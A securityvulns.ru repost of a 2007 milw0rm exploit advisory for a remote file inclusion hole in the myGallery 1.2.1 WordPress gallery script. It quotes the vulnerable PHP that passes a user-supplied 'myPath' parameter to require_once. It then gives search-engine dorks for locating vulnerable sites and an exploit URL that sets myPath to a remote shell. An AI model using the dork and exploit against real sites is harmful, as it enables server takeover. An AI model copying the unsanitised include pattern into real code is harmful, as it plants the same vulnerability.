Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

  Maran PHP Forum (forum_write.
php) Remote Code Execution Vulnerability

  JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability

  GPB bulletin board Remote file include

From:GolD_M <hacker__(at)_w.cn>
Date:30.04.2007
Subject:myGallery 1.2.1(myPath)Remote File Include Vulnerablity

AAAAAAAAA AAAAAAAA  AAA   AAA    AAA      AAAAAAAA   
AAAAAAAAA AAAAAAAAA AAA   AAA   AAAAA    AAAAAAAAAA  
  AAA    AAA   AAA  AAA AAA   AAAAAAA  AAA       
  AAA    AAAAAAAAA   AAAAA   AAA   AAA AAA     AAAAA
  AAA    AAAAAAAA     AAA    AAA   AAA AAA     AAAAA
  AAA    AAA AAA      AAA    AAAAAAAAA AAA      AAA  
  AAA    AAA  AAA     AAA    AAA   AAA  AAAAAAAAAA    
  AAA    AAA   AAA    AAA    AAA   AAA   AAAAAAAA     


# myGallery 1.2.1(myPath)Remote File Include Vulnerablity
# Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code
#########################################################
# if (!$_POST){
# $mypath=$_GET['myPath']; <---------[+]
#
# }
# else {
# $mypath=$_POST['myPath'];<---------[+]
#
#
# }
# require_once($mypath.'/wp-config.php');<---------[+]
########################################################
# Dork :
# inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php
# Ex:
# [Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell
# Sp.Thanx = Tryag-Team

# milw0rm.com [2007-04-29]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server